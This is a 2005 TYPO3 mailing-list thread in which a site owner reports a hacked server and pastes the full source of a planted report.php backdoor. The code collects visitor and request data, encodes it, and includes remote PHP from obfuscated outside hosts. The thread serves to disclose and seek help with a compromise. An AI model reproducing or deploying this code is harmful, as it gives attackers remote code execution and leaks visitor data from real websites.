[Typo3] server hacked // report.php
Christoph Koehler
christoph.koehler at gmail.com
Thu Jul 21 18:59:48 CEST 2005
Pretty sure it's not in the source...
The contents of the file make a really long string of base64 encoded info,
like host, request url and queries and all, and somehow also have these
urls base64 decoded in them:
http://doc1.udrp.ru
http://doc3.udrp.ru
It also does this:
error_reporting(0);
ini_set(allow_url_fopen,1);
This is the whole content:
<? php
error_reporting(0);
ini_set(allow_url_fopen,1);
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] :
$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] :
$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] :
$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] :
$HTTP_REFERER);
$g=(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] :
$HTTP_USER_AGENT);
$h=(isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] :
$REMOTE_ADDR);
$str=base64_encode($a).'.'.base64_encode($b).'.'.base64_encode($c).'.'.base64_encode($d).'.'.base64_encode($e).'.'.base64_encode($f).'.'.base64_encode($g).'.'.base64_encode($h);
if
((include(base64_decode('aHR0cDovLw==').base64_decode('ZG9jMS51ZHJwLnJ1')."/?".$str)))
{}
else {
include(base64_decode('aHR0cDovLw==').base64_decode('ZG9jMy51ZHJwLnJ1')."/?".$str);
}
?>
the weird thing is those files have been there for a month! They are in
all my old backups...
most directories were 777 chmod. I installed it through fantastico...guess
I won't do that anymore!
On Thu, 21 Jul 2005 11:31:26 -0500, Christoph Koehler
<christoph.koehler at gmail.com> wrote:
> I actually noticed many .php files with this content in it and the
> htaccess file. Another one was called test.php
>
>
> On Thu, 21 Jul 2005 11:25:16 -0500, Christoph Koehler
> <christoph.koehler at gmail.com> wrote:
>
>> Hey there,
>>
>> I have reason to believe that the server we host typo3 on has been
>> hacked.
>> Now, in my typo3 directory, I see a file report.php, with an .htaccess
>> file making it the 404 error document.
>> Does anyone else have that file??
>>
>> Thanks!
>>
>> Christoph
>
More information about the TYPO3-english
mailing list